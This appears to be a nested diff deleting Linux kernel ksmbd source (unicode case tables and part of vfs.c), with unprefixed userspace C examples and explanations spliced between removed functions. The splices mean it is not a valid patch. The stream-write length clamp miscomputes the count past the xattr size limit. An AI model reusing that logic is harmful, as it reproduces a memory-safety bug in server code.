+-	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
+-	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Upper case range - Wide latin */
+-static signed char UniCaseRangeUff40[27] = {
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-			 -32, -32, -32, -32, -32,	/* ff40-ff4f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-};
+-
+-/*
+- * Upper Case Range
+- */
+-const struct UniCaseRange SmbUniUpperRange[] = {
+-	{0x03a0, 0x03ce, UniCaseRangeU03a0},
+-	{0x0430, 0x045f, UniCaseRangeU0430},
+-	{0x0490, 0x04cc, UniCaseRangeU0490},
+-	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
+-	{0xff40, 0xff5a, UniCaseRangeUff40},
+-	{0}
+-};
+-#endif
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * Latin lower case
+- */
+-signed char CifsUniLowerTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 040-04f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0,
+-					 0, 0, 0,	/* 050-05f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-				 32, 32, 32, 32,	/* 0c0-0cf */
+-	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32,
+-					 32, 32, 32, 0,	/* 0d0-0df */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
+-	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
+-	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0,
+-						 0,	/* 170-17f */
+-	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79,
+-						 0,	/* 180-18f */
+-	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
+-	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
+-	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
+-};
+-
+-/* Lower case range - Greek */
+-static signed char UniCaseRangeL0380[44] = {
+-	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-						 32, 32, 32,	/* 390-39f */
+-	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/* Lower case range - Cyrillic */
+-static signed char UniCaseRangeL0400[48] = {
+-	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80,
+-					 0, 80, 80,	/* 400-40f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 410-41f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 420-42f */
+-};
+-
+-/* Lower case range - Extended cyrillic */
+-static signed char UniCaseRangeL0490[60] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
+-	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
+-};
+-
+-/* Lower case range - Extended latin and greek */
+-static signed char UniCaseRangeL1e00[504] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
+-	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0,
+-							 0, 0,	/* 1fc0-1fcf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0,
+-							 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Lower case range - Wide latin */
+-static signed char UniCaseRangeLff20[27] = {
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-							 32,	/* ff20-ff2f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/*
+- * Lower Case Range
+- */
+-const struct UniCaseRange CifsUniLowerRange[] = {
+-	{0x0380, 0x03ab, UniCaseRangeL0380},
+-	{0x0400, 0x042f, UniCaseRangeL0400},
+-	{0x0490, 0x04cb, UniCaseRangeL0490},
+-	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
+-	{0xff20, 0xff3a, UniCaseRangeLff20},
+-	{0}
+-};
+-#endif
+-
+-#endif /* __KSMBD_UNIUPR_H */
+diff --git a/fs/ksmbd/vfs.c b/fs/ksmbd/vfs.c
+deleted file mode 100644
+index 94b8ed4ef8707..0000000000000
+--- a/fs/ksmbd/vfs.c
++++ /dev/null
+@@ -1,1911 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/fs.h>
+-#include <linux/uaccess.h>
+-#include <linux/backing-dev.h>
+-#include <linux/writeback.h>
+-#include <linux/xattr.h>
+-#include <linux/falloc.h>
+-#include <linux/fsnotify.h>
+-#include <linux/dcache.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-#include <linux/sched/xacct.h>
+-#include <linux/crc32c.h>
+-
+-#include "../internal.h"	/* for vfs_path_lookup */
+-
+-#include "glob.h"
+-#include "oplock.h"
+-#include "connection.h"
+-#include "vfs.h"
+-#include "vfs_cache.h"
+-#include "smbacl.h"
+-#include "ndr.h"
+-#include "auth.h"
+-#include "misc.h"
+-
+-#include "smb_common.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-
+-static char *extract_last_component(char *path)
+-{
+-	char *p = strrchr(path, '/');
+-
+-	if (p && p[1] != '\0') {
+-		*p = '\0';
+-		p++;
+-	} else {
+-		p = NULL;
+-	}
+-	return p;
+-}
+-
+-static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+-				    struct inode *parent_inode,
+-				    struct inode *inode)
+-{
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_INHERIT_OWNER))
+-		return;
+-
+-	i_uid_write(inode, i_uid_read(parent_inode));
+-}
+-
+-/**
+- * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
+- *
+- * the parent dentry got by dget_parent or @parent could be
+- * unstable, we try to lock a parent inode and lookup the
+- * child dentry again.
+- *
+- * the reference count of @parent isn't incremented.
+- */
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child)
+-{
+-	struct dentry *dentry;
+-	int ret = 0;
+-
+-	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
+-	dentry = lookup_one(user_ns, child->d_name.name, parent,
+-			    child->d_name.len);
+-	if (IS_ERR(dentry)) {
+-		ret = PTR_ERR(dentry);
+-		goto out_err;
+-	}
+-
+-	if (dentry != child) {
+-		ret = -ESTALE;
+-		dput(dentry);
+-		goto out_err;
+-	}
+-
+-	dput(dentry);
+-	return 0;
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	return ret;
+-}
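ksmbd_vfs_lock_parent() re-resolves the child by name under the parent's inode lock and fails with -ESTALE if a concurrent rename moved the dentry. A loose userspace analogue of the same stability check (no locking, just identity comparison between what the name resolves to now and the handle already held; demo.txt is a hypothetical scratch file):

#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

static int child_is_stable(int parent_dirfd, const char *name, int child_fd)
{
	struct stat by_name, by_fd;

	if (fstatat(parent_dirfd, name, &by_name, AT_SYMLINK_NOFOLLOW) < 0)
		return -1;			/* lookup failed */
	if (fstat(child_fd, &by_fd) < 0)
		return -1;
	return by_name.st_dev == by_fd.st_dev &&
	       by_name.st_ino == by_fd.st_ino;	/* 1 = same object */
}

int main(void)
{
	int dir = open(".", O_DIRECTORY | O_RDONLY);
	int fd = open("demo.txt", O_CREAT | O_RDWR, 0600);

	if (dir < 0 || fd < 0)
		return 1;
	printf("stable: %d\n", child_is_stable(dir, "demo.txt", fd));
	/* a rename("demo.txt", "other.txt") here would flip it to 0 */
	close(fd);
	close(dir);
	return 0;
}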
+-
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
+-			 struct dentry *dentry)
+-{
+-	struct dentry *parent;
+-	int ret;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	ret = inode_permission(user_ns, d_inode(parent),
+-			       MAY_EXEC | MAY_WRITE);
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+-}
+-
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+-				   struct dentry *dentry, __le32 *daccess)
+-{
+-	struct dentry *parent;
+-	int ret = 0;
+-
+-	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
+-		*daccess |= cpu_to_le32(WRITE_DAC | WRITE_OWNER | SYNCHRONIZE |
+-				FILE_WRITE_DATA | FILE_APPEND_DATA |
+-				FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES |
+-				FILE_DELETE_CHILD);
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_READ))
+-		*daccess |= FILE_READ_DATA_LE | FILE_READ_EA_LE;
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
+-		*daccess |= FILE_EXECUTE_LE;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
+-		*daccess |= FILE_DELETE_LE;
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_vfs_create() - vfs helper for smb create file
+- * @work:	work
+- * @name:	file name that is relative to share
+- * @mode:	file create mode
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
+-{
+-	struct path path;
+-	struct dentry *dentry;
+-	int err;
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, name,
+-					    LOOKUP_NO_SYMLINKS, &path);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		if (err != -ENOENT)
+-			pr_err("path create failed for %s, err %d\n",
+-			       name, err);
+-		return err;
+-	}
+-
+-	mode |= S_IFREG;
+-	err = vfs_create(mnt_user_ns(path.mnt), d_inode(path.dentry),
+-			 dentry, mode, true);
+-	if (!err) {
+-		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry),
+-					d_inode(dentry));
+-	} else {
+-		pr_err("File(%s): creation failed (err:%d)\n", name, err);
+-	}
+-	done_path_create(&path, dentry);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_mkdir() - vfs helper for smb create directory
+- * @work:	work
+- * @name:	directory name that is relative to share
+- * @mode:	directory create mode
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
+-{
+-	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *dentry;
+-	int err;
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, name,
+-					    LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-					    &path);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		if (err != -EEXIST)
+-			ksmbd_debug(VFS, "path create failed for %s, err %d\n",
+-				    name, err);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	mode |= S_IFDIR;
+-	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
+-	if (err) {
+-		goto out;
+-	} else if (d_unhashed(dentry)) {
+-		struct dentry *d;
+-
+-		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
+-			       dentry->d_name.len);
+-		if (IS_ERR(d)) {
+-			err = PTR_ERR(d);
+-			goto out;
+-		}
+-		if (unlikely(d_is_negative(d))) {
+-			dput(d);
+-			err = -ENOENT;
+-			goto out;
+-		}
+-
+-		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
+-		dput(d);
+-	}
+-out:
+-	done_path_create(&path, dentry);
+-	if (err)
+-		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
+-	return err;
+-}
+-
+-static ssize_t ksmbd_vfs_getcasexattr(struct user_namespace *user_ns,
+-				      struct dentry *dentry, char *attr_name,
+-				      int attr_name_len, char **attr_value)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t value_len = -ENOENT, xattr_list_len;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len <= 0)
+-		goto out;
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
+-		if (strncasecmp(attr_name, name, attr_name_len))
+-			continue;
+-
+-		value_len = ksmbd_vfs_getxattr(user_ns,
+-					       dentry,
+-					       name,
+-					       attr_value);
+-		if (value_len < 0)
+-			pr_err("failed to get xattr in file\n");
+-		break;
+-	}
+-
+-out:
+-	kvfree(xattr_list);
+-	return value_len;
+-}
+-
+-static int ksmbd_vfs_stream_read(struct ksmbd_file *fp, char *buf, loff_t *pos,
+-				 size_t count)
+-{
+-	ssize_t v_len;
+-	char *stream_buf = NULL;
+-
+-	ksmbd_debug(VFS, "read stream data pos : %llu, count : %zd\n",
+-		    *pos, count);
+-
+-	v_len = ksmbd_vfs_getcasexattr(file_mnt_user_ns(fp->filp),
+-				       fp->filp->f_path.dentry,
+-				       fp->stream.name,
+-				       fp->stream.size,
+-				       &stream_buf);
+-	if ((int)v_len <= 0)
+-		return (int)v_len;
+-
+-	if (v_len <= *pos) {
+-		count = -EINVAL;
+-		goto free_buf;
+-	}
+-
+-	if (v_len - *pos < count)
+-		count = v_len - *pos;
+-
+-	memcpy(buf, &stream_buf[*pos], count);
+-
+-free_buf:
+-	kvfree(stream_buf);
+-	return count;
+-}
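ksmbd_vfs_stream_read() serves an SMB named stream out of an xattr blob: fetch the whole value, reject a position past its end, clamp the count to what remains. The same slice logic from userspace, against a hypothetical user.stream.demo attribute (an illustrative name, not ksmbd's real stream-xattr prefix):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/xattr.h>

static ssize_t stream_read(const char *path, const char *xattr,
			   char *buf, off_t pos, size_t count)
{
	ssize_t v_len = getxattr(path, xattr, NULL, 0);	/* probe the size */
	char *blob;

	if (v_len <= 0)
		return v_len;
	if (pos >= v_len)
		return -1;			/* like the -EINVAL above */
	blob = malloc(v_len);
	if (!blob)
		return -1;
	if (getxattr(path, xattr, blob, v_len) != v_len) {
		free(blob);
		return -1;
	}
	if ((off_t)count > v_len - pos)
		count = v_len - pos;		/* clamp to the stream end */
	memcpy(buf, blob + pos, count);
	free(blob);
	return count;
}

int main(void)
{
	FILE *f = fopen("demo.txt", "w");	/* scratch file on an xattr-capable fs */
	char out[8] = "";

	if (!f)
		return 1;
	fclose(f);
	if (setxattr("demo.txt", "user.stream.demo", "hello stream", 12, 0))
		return 1;
	if (stream_read("demo.txt", "user.stream.demo", out, 6, 6) == 6)
		printf("%.6s\n", out);		/* prints "stream" */
	return 0;
}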
+-
+-/**
+- * check_lock_range() - vfs helper for smb byte range file locking
+- * @filp:	the file to apply the lock to
+- * @start:	lock start byte offset
+- * @end:	lock end byte offset
+- * @type:	byte range type read/write
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int check_lock_range(struct file *filp, loff_t start, loff_t end,
+-			    unsigned char type)
+-{
+-	struct file_lock *flock;
+-	struct file_lock_context *ctx = file_inode(filp)->i_flctx;
+-	int error = 0;
+-
+-	if (!ctx || list_empty_careful(&ctx->flc_posix))
+-		return 0;
+-
+-	spin_lock(&ctx->flc_lock);
+-	list_for_each_entry(flock, &ctx->flc_posix, fl_list) {
+-		/* check conflict locks */
+-		if (flock->fl_end >= start && end >= flock->fl_start) {
+-			if (flock->fl_type == F_RDLCK) {
+-				if (type == WRITE) {
+-					pr_err("not allow write by shared lock\n");
+-					error = 1;
+-					goto out;
+-				}
+-			} else if (flock->fl_type == F_WRLCK) {
+-				/* check owner in lock */
+-				if (flock->fl_file != filp) {
+-					error = 1;
+-					pr_err("not allow rw access by exclusive lock from other opens\n");
+-					goto out;
+-				}
+-			}
+-		}
+-	}
+-out:
+-	spin_unlock(&ctx->flc_lock);
+-	return error;
+-}
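check_lock_range() walks the inode's POSIX lock list by hand because the server checks locks on behalf of a remote client rather than for its own file descriptor. From an ordinary process, the equivalent "would a read or write on this range conflict?" question is what fcntl(F_GETLK) answers (it only reports locks held by other processes, much like the exclusive-lock owner check above):

#include <fcntl.h>
#include <stdio.h>

static int range_conflicts(int fd, short type, off_t start, off_t len)
{
	struct flock fl = {
		.l_type   = type,		/* F_RDLCK or F_WRLCK */
		.l_whence = SEEK_SET,
		.l_start  = start,
		.l_len    = len,
	};

	if (fcntl(fd, F_GETLK, &fl) < 0)
		return -1;
	return fl.l_type != F_UNLCK;		/* 1 = conflicting lock exists */
}

int main(void)
{
	int fd = open("demo.txt", O_RDWR | O_CREAT, 0600);

	if (fd < 0)
		return 1;
	printf("write [0,100) conflicts: %d\n",
	       range_conflicts(fd, F_WRLCK, 0, 100));
	return 0;
}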
+-
+-/**
+- * ksmbd_vfs_read() - vfs helper for smb file read
+- * @work:	smb work
+- * @fid:	file id of open file
+- * @count:	read byte count
+- * @pos:	file pos
+- *
+- * Return:	number of read bytes on success, otherwise error
+- */
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
+-		   loff_t *pos)
+-{
+-	struct file *filp = fp->filp;
+-	ssize_t nbytes = 0;
+-	char *rbuf = work->aux_payload_buf;
+-	struct inode *inode = file_inode(filp);
+-
+-	if (S_ISDIR(inode->i_mode))
+-		return -EISDIR;
+-
+-	if (unlikely(count == 0))
+-		return 0;
+-
+-	if (work->conn->connection_type) {
+-		if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
+-			pr_err("no right to read(%pD)\n", fp->filp);
+-			return -EACCES;
+-		}
+-	}
+-
+-	if (ksmbd_stream_fd(fp))
+-		return ksmbd_vfs_stream_read(fp, rbuf, pos, count);
+-
+-	if (!work->tcon->posix_extensions) {
+-		int ret;
+-
+-		ret = check_lock_range(filp, *pos, *pos + count - 1, READ);
+-		if (ret) {
+-			pr_err("unable to read due to lock\n");
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	nbytes = kernel_read(filp, rbuf, count, pos);
+-	if (nbytes < 0) {
+-		pr_err("smb read failed, err = %zd\n", nbytes);
+-		return nbytes;
+-	}
+-
+-	filp->f_pos = *pos;
+-	return nbytes;
+-}
+-
+-static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+-				  size_t count)
+-{
+-	char *stream_buf = NULL, *wbuf;
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	size_t size, v_len;
+-	int err = 0;
+-
+-	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
+-		    *pos, count);
+-
+-	size = *pos + count;
+-	if (size > XATTR_SIZE_MAX) {
+-		size = XATTR_SIZE_MAX;
+-		count = (*pos + count) - XATTR_SIZE_MAX;
+-	}
+-
+-	v_len = ksmbd_vfs_getcasexattr(user_ns,
+-				       fp->filp->f_path.dentry,
+-				       fp->stream.name,
+-				       fp->stream.size,
+-				       &stream_buf);
+-	if ((int)v_len < 0) {
+-		pr_err("not found stream in xattr : %zd\n", v_len);
+-		err = (int)v_len;
+-		goto out;
+-	}
+-
+-	if (v_len < size) {
+-		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
+-		if (!wbuf) {
+-			err = -ENOMEM;
+-			goto out;
+-		}
+-
+-		if (v_len > 0)
+-			memcpy(wbuf, stream_buf, v_len);
+-		kvfree(stream_buf);
+-		stream_buf = wbuf;
+-	}
+-
+-	memcpy(&stream_buf[*pos], buf, count);
+-
+-	err = ksmbd_vfs_setxattr(user_ns,
+-				 fp->filp->f_path.dentry,
+-				 fp->stream.name,
+-				 (void *)stream_buf,
+-				 size,
+-				 0);
+-	if (err < 0)
+-		goto out;
+-
+-	fp->filp->f_pos = *pos;
+-	err = 0;
+-out:
+-	kvfree(stream_buf);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_write() - vfs helper for smb file write
+- * @work:	work
+- * @fid:	file id of open file
+- * @buf:	buf containing data for writing
+- * @count:	read byte count
+- * @pos:	file pos
+- * @sync:	fsync after write
+- * @written:	number of bytes written
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		    char *buf, size_t count, loff_t *pos, bool sync,
+-		    ssize_t *written)
+-{
+-	struct file *filp;
+-	loff_t	offset = *pos;
+-	int err = 0;
+-
+-	if (work->conn->connection_type) {
+-		if (!(fp->daccess & FILE_WRITE_DATA_LE)) {
+-			pr_err("no right to write(%pD)\n", fp->filp);
+-			err = -EACCES;
+-			goto out;
+-		}
+-	}
+-
+-	filp = fp->filp;
+-
+-	if (ksmbd_stream_fd(fp)) {
+-		err = ksmbd_vfs_stream_write(fp, buf, pos, count);
+-		if (!err)
+-			*written = count;
+-		goto out;
+-	}
+-
+-	if (!work->tcon->posix_extensions) {
+-		err = check_lock_range(filp, *pos, *pos + count - 1, WRITE);
+-		if (err) {
+-			pr_err("unable to write due to lock\n");
+-			err = -EAGAIN;
+-			goto out;
+-		}
+-	}
+-
+-	/* Do we need to break any of a levelII oplock? */
+-	smb_break_all_levII_oplock(work, fp, 1);
+-
+-	err = kernel_write(filp, buf, count, pos);
+-	if (err < 0) {
+-		ksmbd_debug(VFS, "smb write failed, err = %d\n", err);
+-		goto out;
+-	}
+-
+-	filp->f_pos = *pos;
+-	*written = err;
+-	err = 0;
+-	if (sync) {
